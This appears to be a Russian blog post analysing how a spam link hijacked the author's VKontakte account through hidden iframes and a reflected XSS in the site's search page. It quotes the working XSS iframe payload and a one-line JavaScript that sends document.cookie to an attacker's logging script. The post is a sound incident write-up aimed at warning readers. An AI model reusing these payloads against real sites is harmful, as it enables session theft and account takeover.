Pull to refresh

Как стать разносчиком спама ВКонтакте из-за любопытства

Information Security *
Буквально несколько минут назад я умудрился разослать 200+ сообщений своим друзьям ВКонтакте.
Естественно это было спам сообщение следующего содержания:
привет я удаляюсь из контакта, оч много спама приходит((сейчас удалю свою страничку, если что-то будет нужно, то звони мне на моб.телефон или ищи меня здесь vkontakte.ru/away.php?to=… у меня там есть своя страничка под мои именем.это не спам, рассылаю всем своим друзьям...).

Собственно удивление было связано с тем, что:
1. Я использую Linux и только Linux везде где только можно.
2. ВКонтакт используется только из дома опять же сугубо из-под Linux
3. На ВКонтакт и на почту, привязанную к нему стоят достаточно криптостойкие пароли из 10+ символов латинского алфавита и цифр Да, я параноик


Внимание! Все последующие переходы по ссылкам вне этой статьи для Вашей безопасности советую проводить только если Вы разлогинены из ВКонтакта.

Первым делом я решил посмотреть куда же ведет эта ссылка, что я рассылал.
Ссылка вела на сайт vk-foto.ru, который сразу же редиректил на odnonochniki.ru/?rid=484
С анализа «одноночников» я решил и начать.
Тем не менее ничего вредоносного замечено не было.
«Гм», сказали суровые сибирские мужики я, закрыл Оперу, и открыл фаерфокс.
Первым делом в Web Developer Toolbar я отключил переход по META-редиректам и включил Firebug для сайта vk-foto.ru. Убедившись что в Firefox'е я разлогинен ВКонтакте, я пошел на сайт.
Анализ HTML кода быстро обнаружил желаемое:
<iframe src='http://vk-foto.ru/2/1.php' style='display:none;' ></iframe>

Уже предвкушая разгадку, я набрал упомянутый адрес и получил… 404 ошибку апача.
Ну что ж, значит надо поковыряться глубже.
Для vk-foto включил панель Net Firebug'а, перезагрузил страничку и стал смотреть что грузится:

Увидев это я обругал себя последними словами. Ведь было за что:
1. Не все что выглядит как 404 Апача является ею. Код возврата НТТР надо смотреть всегда
2. Увидев «404» я даже не удосужился глянуть в ее код

Итак, очередной iframe:
<iframe src = vkontakte.ru/gsearch.php?from=ads&section=ads&c[type]=1&c[%22%3E%3CsCRIPT%20%20src%20%3d%20http://webzer.vov.ru/vk.js%20%20%3E%3C/script%3E]=2 width='0' height='0' style='display:none' ></iframe>

Гм. А вот это уже похоже на XSS Вконтакте. На страничку поиска подсасывается внешний Javascript.
Его содержимое просто как апельсин:
location.href='http://webzer.vov.ru/css/log.php?' + document.cookie

Таким образом куки ВКонтакта уходят на сторонний хост.

Что из всего этого следует:
  1. то что вы пользуетесь Linux еще не защищает Вас от всего
  2. от любопытства кошка сдохла — получив от друга такое сообщение я пошел по ссылке, за что и поплатился
  3. (следует из предыдущего) никогда не ходите по ссылкам, полученным неизвестно откуда
  4. Не все то 404, что так выглядит :)
  5. Как ни печально, но и на старуху (ВКонтакте) бывает проруха.


DISCLAIMER: Я прекрасно понимаю, что профессионалам в области информационной безопасности я не рассказал ничего нового. Этот пост направлен скорее на рядовых IT-шников, и призван уберечь их от наступания на мои грабли

Tags:
Hubs:
Total votes 283: ↑246 and ↓37 +209
Views 15K
Comments Comments 185